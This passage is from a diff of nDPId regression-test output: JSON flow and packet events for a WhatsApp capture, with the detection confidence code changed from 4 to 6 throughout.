00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655065885823,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ghFAAD8GgDDAqAJkszzDMcoMFGZjsgDIAAAAAKAC\/\/8NZwAAAgQFtAQCCApICHYoAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655065885823,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ghJAAD8GgDfAqAJkszzDMcoMFGZjsgDJIofjooAQAVdpNQAAAQEICkgIdkmT2Dd0"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655065885823,"pkt":"eJS0JASgYDjgxTWgCABFAAA4ghNAAD8GgDLAqAJkszzDMcoMFGZjsgDJIofjooAYAVcjvgAAAQEICkgIdm+T2Dd0RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655065885823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655065885823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":313,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":313,"packets-processed":312,"total-skipped-flows":0,"total-l4-payload-len":26320,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":39,"total-detection-updates":0,"total-updates":0,"current-active-flows":10,"total-active-flows":39,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":256,"global_ts_msec":1655067574156} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655067574156,"flow_last_seen":1655067574156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655067574156,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1655067574156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655067574156,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ZktAAD8Gm\/bAqAJkszzDMbEWFGZP\/CSfAAAAAKAC\/\/80aAAAAgQFtAQCCArGuNlKAAAAAAEDAwk="} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1655067574187,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655067574187,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ZkxAAD8Gm\/3AqAJkszzDMbEWFGZP\/CSg\/FJ4JoAQAKwGCgAAAQEICsa42a+DX2Qy"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1655067574192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655067574192,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Zk1AAD8Gm\/jAqAJkszzDMbEWFGZP\/CSg\/FJ4JoAYAKzAswAAAQEICsa42bSDX2QyRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655067574156,"flow_last_seen":1655067574223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655067574223,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":321,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655059510580,"flow_last_seen":1655059510757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655067574418,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655067574156,"flow_last_seen":1655067574223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655067574223,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":321,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655059510580,"flow_last_seen":1655059510757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655067574418,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655068071917,"flow_last_seen":1655068071917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655068071917,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1655068071917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655068071917,"pkt":"eJS0JASgYDjgxTWgCABFAAA8f0dAAD8GgvrAqAJkszzDMcu4FGbUWpFrAAAAAKAC\/\/9c\/wAAAgQFtAQCCApIKiN2AAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1655068071949,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655068071949,"pkt":"eJS0JASgYDjgxTWgCABFAAA0f0hAAD8GgwHAqAJkszzDMcu4FGbUWpFsCrZXEIAQAVd+jAAAAQEICkgqI5aouQE5"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1655068072089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655068072089,"pkt":"eJS0JASgYDjgxTWgCABFAAA4f0lAAD8GgvzAqAJkszzDMcu4FGbUWpFsCrZXEIAYAVc4rwAAAQEICkgqJCKouQE5RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068071917,"flow_last_seen":1655068072120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655068072120,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1655060495977,"flow_last_seen":1655060496256,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1317,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1655068072357,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068071917,"flow_last_seen":1655068072120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655068072120,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1655060495977,"flow_last_seen":1655060496256,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1317,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1655068072357,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":329,"packets-processed":328,"total-skipped-flows":0,"total-l4-payload-len":26960,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":41,"total-detection-updates":0,"total-updates":0,"current-active-flows":10,"total-active-flows":41,"total-idle-flows":31,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":269,"global_ts_msec":1655068204945} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655068204945,"flow_last_seen":1655068204945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655068204945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1655068204945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655068204945,"pkt":"eJS0JASgYDjgxTWgCABFAAA8eR1AAD8GiTTAqAJkszzDIaLAFGY48OrHAAAAAKAC\/\/8oAgAAAgQFtAQCCAoF9wW8AAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1655068204976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655068204976,"pkt":"eJS0JASgYDjgxTWgCABFAAA0eR5AAD8GiTvAqAJkszzDIaLAFGY48OrIWCi8FIAQAKyAowAAAQEICgX3Bdt\/K0Hp"} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1655068204977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655068204977,"pkt":"eJS0JASgYDjgxTWgCABFAAA4eR9AAD8GiTbAqAJkszzDIaLAFGY48OrIWCi8FIAYAKw7UQAAAQEICgX3Bdx\/K0HpRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068204945,"flow_last_seen":1655068204978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655068204978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068204945,"flow_last_seen":1655068204978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655068204978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655068672605,"flow_last_seen":1655068672605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655068672605,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1655068672605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655068672605,"pkt":"eJS0JASgYDjgxTWgCABFAAA8f7NAAD8Ggo7AqAJkszzDMcxGFGbT7kd7AAAAAKAC\/\/98VAAAAgQFtAQCCApIM03mAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1655068672638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655068672638,"pkt":"eJS0JASgYDjgxTWgCABFAAA0f7RAAD8GgpXAqAJkszzDMcxGFGbT7kd8DNw8XIAQAVenVgAAAQEICkgzTgfXLOHd"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1655068672650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655068672650,"pkt":"eJS0JASgYDjgxTWgCABFAAA4f7VAAD8GgpDAqAJkszzDMcxGFGbT7kd8DNw8XIAYAVdh+QAAAQEICkgzThPXLOHdRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068672605,"flow_last_seen":1655068672682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655068672682,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068672605,"flow_last_seen":1655068672682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655068672682,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":345,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":345,"packets-processed":344,"total-skipped-flows":0,"total-l4-payload-len":28550,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":43,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":43,"total-idle-flows":31,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":280,"global_ts_msec":1655069476999} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655069476999,"flow_last_seen":1655069476999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655069476999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1655069476999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655069476999,"pkt":"eJS0JASgYDjgxTWgCABFAAA8v0dAAD8GQwrAqAJkszzDIaL6FGZl3G3iAAAAAKAC\/\/\/JXwAAAgQFtAQCCAoF+bQbAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1655069477033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655069477033,"pkt":"eJS0JASgYDjgxTWgCABFAAA0v0hAAD8GQxHAqAJkszzDIaL6FGZl3G3jvQquJIAQAKzBYgAAAQEICgX5tE0ysJf9"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1655069477034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655069477034,"pkt":"eJS0JASgYDjgxTWgCABFAAA4v0lAAD8GQwzAqAJkszzDIaL6FGZl3G3jvQquJIAYAKx8DgAAAQEICgX5tFAysJf9RUQAAQ=="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655069476999,"flow_last_seen":1655069477066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1269,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1655069477066,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655061873005,"flow_last_seen":1655061873914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1655069477452,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655061657436,"flow_last_seen":1655061657966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655069477452,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655069476999,"flow_last_seen":1655069477066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1269,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1655069477066,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655061873005,"flow_last_seen":1655061873914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1655069477452,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655061657436,"flow_last_seen":1655061657966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655069477452,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 